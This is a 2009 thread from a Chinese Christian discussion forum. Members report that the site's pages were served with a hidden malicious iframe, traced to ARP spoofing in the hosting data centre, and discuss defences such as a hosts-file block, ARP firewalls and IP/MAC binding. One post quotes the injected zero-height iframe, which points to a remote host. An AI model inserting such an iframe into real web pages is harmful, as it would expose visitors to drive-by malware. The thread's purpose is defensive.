『恩友之光』基督徒网络交流论坛

 找回密码
 立即注册
搜索
 
查章节:  
查经文:
查看: 3780|回复: 11
收起左侧

约拿站长进来一下,发现病毒

[复制链接]
发表于 2009-3-1 09:41 | 显示全部楼层 |阅读模式

网站被挂马了,几乎每个页面都加了iframe,代码如下:

 

  1. <iframe src=http://www.xxxkkkkkkk.cn/11.htm width=50 height=0></iframe>
复制代码

 

有计算机基础的朋友,请用记事本打开C:\Windows\System32\Drivers\etc\hosts,再末尾加上:

 

127.0.0.1 www.xxxkkkkkkk.cn

 

这样在站长把病毒代码去掉以前,可以先暂时防止病毒。

发表于 2009-3-1 19:15 | 显示全部楼层

这已经是这个月来的第二次了,是ARP攻击,我的头都大了。

 

网页并没有被镶入病毒代码,只是我们服务器所在的机房中有其他服务器对我们的服务器进行ARP攻击,模拟网关进行欺骗,拦截我们服务器的Http数据包,自动加入iframe代码,这台病毒服务器已经在中午十二点被管理员停掉了。因为今天是主日,我还要带领聚会,所以没时间处理,只能暂时关闭网站。

 

这次我已经换了新的ARP防火墙,不知道会不会有效。实在不行,只能购买专业的ARP防火墙了。

回复

使用道具 举报

发表于 2009-3-1 19:57 | 显示全部楼层
辛苦了,上帝一定会祝福你们手中的工作。
回复

使用道具 举报

发表于 2009-3-1 20:05 | 显示全部楼层

辛苦了~

还好只是病毒,网站平安,感谢主

回复

使用道具 举报

 楼主| 发表于 2009-3-1 22:32 | 显示全部楼层

哦。。。原来是ARP攻击啊?

 

我想你应该联系管理员,进行ip绑定,这样才能比较好地解决arp攻击。

回复

使用道具 举报

发表于 2009-3-1 23:14 | 显示全部楼层
怪不得今天回不了家门口,原来又是这回事!求神坚固我们手所作的工!
回复

使用道具 举报

发表于 2009-3-2 07:59 | 显示全部楼层
原来是这样啊。
回复

使用道具 举报

发表于 2009-3-2 07:59 | 显示全部楼层
我想怎么老是打不开网页,原来是被攻击了。
回复

使用道具 举报

 楼主| 发表于 2009-3-2 09:39 | 显示全部楼层

我觉得没有购买专门的arp防火墙的必要,arp防火墙不外乎就是在第一次启动的时候查找当前的网关mac,然后记录下来。当网关mac发生改变的时候,就发出警告,截拦什么的。

 

专业的防火墙只是把这些工作都自动化了而已,其实你也可以让管理员给你手动绑定ip的。

回复

使用道具 举报

发表于 2009-3-2 11:15 | 显示全部楼层
以下是引用billypon在2009-3-2 9:39:00的发言:

我觉得没有购买专门的arp防火墙的必要,arp防火墙不外乎就是在第一次启动的时候查找当前的网关mac,然后记录下来。当网关mac发生改变的时候,就发出警告,截拦什么的。

 

专业的防火墙只是把这些工作都自动化了而已,其实你也可以让管理员给你手动绑定ip的。

 

谢谢弟兄的专业支持!

 

我不懂这些,不过就我的考虑,如果这么简单可以解决的话那个专门arp防火墙还会有市场么?还是做了就是给不懂这些的人用的?

 

绑定IP可以防止这个攻击,那它有没有什么不利的地方呢?

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|小黑屋|手机版|恩友之光 ( 桂ICP备2023005629号-1 )

GMT+8, 2024-11-22 06:10

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表